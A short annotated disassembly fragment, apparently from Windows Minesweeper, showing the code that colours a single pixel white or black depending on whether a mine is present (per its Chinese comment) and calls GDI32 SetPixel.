:01002146 F6D8                    neg al
:01002148 1BC0                    sbb eax, eax
:0100214A 25010000FF              and eax, FF000001
:0100214F 05FFFFFF00              add eax, 00FFFFFF
:01002154 50                      push eax

;如果EAX为00ffffff那么画白色说明没雷,EAX为00000000那么画黑色说明有雷
:01002155 57                      push edi
:01002156 57                      push edi
:01002157 56                      push esi

* Reference To: GDI32.SetPixel, Ord:022Fh
|
:01002158 FF1558100001 Call dword ptr [01001058]